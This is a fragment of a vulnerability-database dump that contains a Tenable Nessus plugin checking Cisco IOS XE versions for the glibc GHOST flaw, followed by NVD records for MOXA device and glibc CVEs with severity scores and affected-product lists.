510c7fbe9816d2d0c4bd28014c99f98c2c3c652755bdecb3c8e54563635712efb3d2cdb840055785e61f805eb0d2a62f3726ab54ca81843fd44a7249dbab64ae165a06a8fe178a01256963d281cf715987005dba742f8c5127fc8d1c617765362d1681e306ef9ca3e9be42952c5eba6c5bc25eede700ce0c336acbc2f761419f778221dd6c96635e7a364ba379cf36de3e57a2e06c56252b888e3131d7c2f050dc1521aae167c755efef18e71796b19c703d42731d65c20ec6afa77442576511ddac67a8cf6ead79cf1f450d7ada2c8296e1a6d113c5409382850e5e394a7e713e3caf5223887d0c6371c0e103c3c4059d91d1de2d757678daa69e6cf4a64d7f25b3a01a0c8a4ab7a7241f779cd3d135ba7283b688a7e97b3872a8a2f53256e0cad19055959e2a52363b6d2ad74a1cba8d24950ed9f17863e11939481194d5a53c55a270a5676770eb508e44c35e9ba5d7500dc6a662e0a116e565b1113ff80fa8a16ad8aa7fba421df14198cf6801eec0286794e8949c4b6a00697473ba9ed942e06901d51dd2d0df160e4f191ed02aec67acfbd5ccdfe10aee02395a918f9b05f20146876d05b79ae55e8f82728ca61c58747240650e83fa55068ff2403324ec06771b9aa10deff522c2e0c6f3b88cb095206b9332dbeacfefb62827dc6638e7b8da2a2cdb446c205372ea7c41aebe5279403e3641547cc078a07d299074c7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81594);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69732\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XE GNU C Library (glibc) Buffer Overflow (CSCus69732) (GHOST)\");\n script_summary(english:\"Checks IOS XE version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XE software\nthat is affected by a heap-based buffer overflow vulnerability in the\nGNU C Library (glibc) due to improperly validated user-supplied input\nto the __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2() functions. This allows a remote attacker to cause a\nbuffer overflow, resulting in a denial of service condition or the\nexecution of arbitrary code.\n\nNote that only the following devices are listed as affected :\n\n - Cisco ASR 1000 Series Aggregation Services Routers\n - Cisco ASR 920 Series Aggregation Services Routers\n - Cisco ASR 900 Series Aggregation Services Routers\n - Cisco 4400 Series Integrated Services Routers\n - Cisco 4300 Series Integrated Services Routers\n - Cisco Cloud Services Router 1000V Series\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69732\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69732.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Model\");\n\n# Model check\n# Per Bug CSCus69732\nif (\n !(\n \"ASR1k\" >< model ||\n \"ASR920\" >< model ||\n \"ASR900\" >< model ||\n \"ISR4400\" >< model ||\n \"ISR4300\" >< model ||\n \"CSR1000V\" >< model\n )\n) audit(AUDIT_HOST_NOT, \"an affected model\");\n\n# Version check\n# Per Bug CSCus69732\n# - top list (raw)\n# - and bottom list (converted)\nif (\n version == \"3.10.0S\" || #bl\n version == \"3.10.4S\" || #bl\n version == \"3.11.0S\" || #bl\n version == \"3.11.2S\" || #bl\n version == \"3.11.3S\" ||\n version == \"3.12.0S\" || #bl\n version == \"3.12.1S\" || #bl\n version == \"3.13.0S\" || #bl\n version == \"3.13.2S\" ||\n version == \"3.14.S\" ||\n version == \"3.4.7S\" ||\n version == \"3.7.0S\" || #bl\n version == \"3.7.6S\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69732' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(port:0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T19:02:55", "description": "Certain MOXA devices allow reflected XSS via the Config Import menu. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-07T06:15:00", "type": "cve", "title": "CVE-2021-39278", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39278"], "modified": "2021-09-09T23:31:00", "cpe": ["cpe:/o:moxa:wdr-3124a-eu_firmware:2.3", "cpe:/o:moxa:wdr-3124a-us-t_firmware:2.3", "cpe:/o:moxa:oncell_g3470a-lte-eu-t_firmware:1.7", "cpe:/o:moxa:wdr-3124a-eu-t_firmware:2.3", "cpe:/o:moxa:wac-2004_firmware:1.7", "cpe:/o:moxa:wac-1001-t_firmware:2.1", "cpe:/o:moxa:oncell_g3470a-lte-eu_firmware:1.7", "cpe:/o:moxa:tap-323-us-ct-t_firmware:1.3", "cpe:/o:moxa:wdr-3124a-us_firmware:2.3", "cpe:/o:moxa:tap-323-eu-ct-t_firmware:1.3", "cpe:/o:moxa:wac-1001_firmware:2.1", "cpe:/o:moxa:tap-323-jp-ct-t_firmware:1.3"], "id": "CVE-2021-39278", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39278", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:moxa:wac-1001-t_firmware:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wac-2004_firmware:1.7:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-eu-t_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-us_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:tap-323-jp-ct-t_firmware:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:oncell_g3470a-lte-eu_firmware:1.7:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:tap-323-eu-ct-t_firmware:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wac-1001_firmware:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:oncell_g3470a-lte-eu-t_firmware:1.7:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-eu_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-us-t_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:tap-323-us-ct-t_firmware:1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:02:55", "description": "Certain MOXA devices allow Authenticated Command Injection via /forms/web_importTFTP. This affects WAC-2004 1.7, WAC-1001 2.1, WAC-1001-T 2.1, OnCell G3470A-LTE-EU 1.7, OnCell G3470A-LTE-EU-T 1.7, TAP-323-EU-CT-T 1.3, TAP-323-US-CT-T 1.3, TAP-323-JP-CT-T 1.3, WDR-3124A-EU 2.3, WDR-3124A-EU-T 2.3, WDR-3124A-US 2.3, and WDR-3124A-US-T 2.3.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T06:15:00", "type": "cve", "title": "CVE-2021-39279", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39279"], "modified": "2021-09-09T23:33:00", "cpe": ["cpe:/o:moxa:wdr-3124a-eu_firmware:2.3", "cpe:/o:moxa:wdr-3124a-us-t_firmware:2.3", "cpe:/o:moxa:oncell_g3470a-lte-eu-t_firmware:1.7", "cpe:/o:moxa:wdr-3124a-eu-t_firmware:2.3", "cpe:/o:moxa:wac-2004_firmware:1.7", "cpe:/o:moxa:wac-1001-t_firmware:2.1", "cpe:/o:moxa:oncell_g3470a-lte-eu_firmware:1.7", "cpe:/o:moxa:tap-323-us-ct-t_firmware:1.3", "cpe:/o:moxa:wdr-3124a-us_firmware:2.3", "cpe:/o:moxa:tap-323-eu-ct-t_firmware:1.3", "cpe:/o:moxa:wac-1001_firmware:2.1", "cpe:/o:moxa:tap-323-jp-ct-t_firmware:1.3"], "id": "CVE-2021-39279", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39279", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:moxa:wac-1001-t_firmware:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wac-2004_firmware:1.7:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-eu-t_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-us_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:tap-323-jp-ct-t_firmware:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:oncell_g3470a-lte-eu_firmware:1.7:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:tap-323-eu-ct-t_firmware:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wac-1001_firmware:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:oncell_g3470a-lte-eu-t_firmware:1.7:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-eu_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:wdr-3124a-us-t_firmware:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:moxa:tap-323-us-ct-t_firmware:1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:56:47", "description": "The send_dg function in resolv/res_send.c in GNU C Library (aka glibc or libc6) before 2.20 does not properly reuse file descriptors, which allows remote attackers to send DNS queries to unintended locations via a large number of requests that trigger a call to the getaddrinfo function.", "cvss3": {}, "published": "2015-02-24T15:59:00", "type": "cve", "title": "CVE-2013-7423", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7423"], "modified": "2021-09-01T18:15:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/o:opensuse:opensuse:13.1", "cpe:/o:redhat:enterprise_linux_server_aus:6.5", "cpe:/o:canonical:ubuntu_linux:12.04"], "id": "CVE-2013-7423", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7423", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:22:47", "description": "Stack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in GNU C Library (aka glibc or libc6) 2.17 and earlier allows remote attackers to cause a denial of service (crash) via a (1) hostname or (2) IP address that triggers a large number of domain conversion results.", "cvss3": {}, "published": "2013-04-29T22:55:00", "type": "cve", "title": "CVE-2013-1914", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1914"], "modified": "2021-09-01T18:15:00", "cpe": ["cpe:/a:gnu:glibc:2.3.1", "cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.14.1", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.14", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.16", "cpe:/a:gnu:glibc:2.15", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.11.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.17", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.12.2", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:2.12.1", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.11.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.5.1"], "id": "CVE-2013-1914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1914", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-20T20:33:30", "description": "Multiple stack-based buffer overflows in the (1) send_dg and (2) send_vc functions in the libresolv library in the GNU C Library (aka glibc or libc6) before 2.23 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted DNS response that triggers a call to the getaddrinfo function with the AF_UNSPEC or AF_INET6 address family, related to performing \"dual A/AAAA DNS queries\" and the libnss_dns.so.2 NSS module.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-18T21:59:00", "type": "cve", "title": "CVE-2015-7547", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2022-06-20T19:15:00", "cpe": ["cpe:/a:gnu:glibc:2.20", "cpe:/a:gnu:glibc:2.11.3", "cpe:/a:oracle:exalogic_infrastructure:1.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:suse:linux_enterprise_software_development_kit:11.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/a:hp:helion_openstack:2.0.0", "cpe:/a:gnu:glibc:2.14.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.0.0", "cpe:/a:gnu:glibc:2.19", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.0.0", "cpe:/a:gnu:glibc:2.13", "cpe:/a:sophos:unified_threat_management_software:9.355", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:gnu:glibc:2.11", "cpe:/a:f5:big-ip_link_controller:12.0.0", "cpe:/o:suse:linux_enterprise_server:11.0", "cpe:/o:suse:linux_enterprise_desktop:11.0", "cpe:/a:oracle:exalogic_infrastructure:2.0", "cpe:/a:gnu:glibc:2.21", "cpe:/a:f5:big-ip_analytics:12.0.0", "cpe:/a:gnu:glibc:2.17", "cpe:/a:f5:big-ip_local_traffic_manager:12.0.0", "cpe:/a:gnu:glibc:2.22", "cpe:/a:gnu:glibc:2.11.2", "cpe:/a:gnu:glibc:2.15", "cpe:/a:gnu:glibc:2.10.1", "cpe:/o:oracle:fujitsu_m10_firmware:2290", "cpe:/a:hp:server_migration_pack:7.5", "cpe:/a:hp:helion_openstack:2.1.0", "cpe:/o:suse:linux_enterprise_desktop:12", "cpe:/o:suse:linux_enterprise_software_development_kit:12", "cpe:/a:gnu:glibc:2.12", "cpe:/a:f5:big-ip_domain_name_system:12.0.0", "cpe:/a:gnu:glibc:2.12.1", "cpe:/a:gnu:glibc:2.16", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:opensuse:opensuse:13.2", "cpe:/a:suse:linux_enterprise_debuginfo:11.0", "cpe:/a:f5:big-ip_application_security_manager:12.0.0", "cpe:/a:gnu:glibc:2.18", "cpe:/a:hp:helion_openstack:1.1.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.12.2", "cpe:/a:f5:big-ip_access_policy_manager:12.0.0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:sophos:unified_threat_management_software:9.319", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:suse:linux_enterprise_server:12", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/a:gnu:glibc:2.14", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:suse:suse_linux_enterprise_server:12", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:f5:big-ip_application_acceleration_manager:12.0.0"], "id": "CVE-2015-7547", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7547", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:f5:big-ip_domain_name_system:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.17:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:12:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:12:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.19:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.18:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:oracle:fujitsu_m10_firmware:2290:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:exalogic_infrastructure:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:helion_openstack:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11.0:sp4:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.21:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_software_development_kit:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11.0:sp2:*:*:lts:*:*:*", "cpe:2.3:a:gnu:glibc:2.22:*:*:*:*:*:*:*", 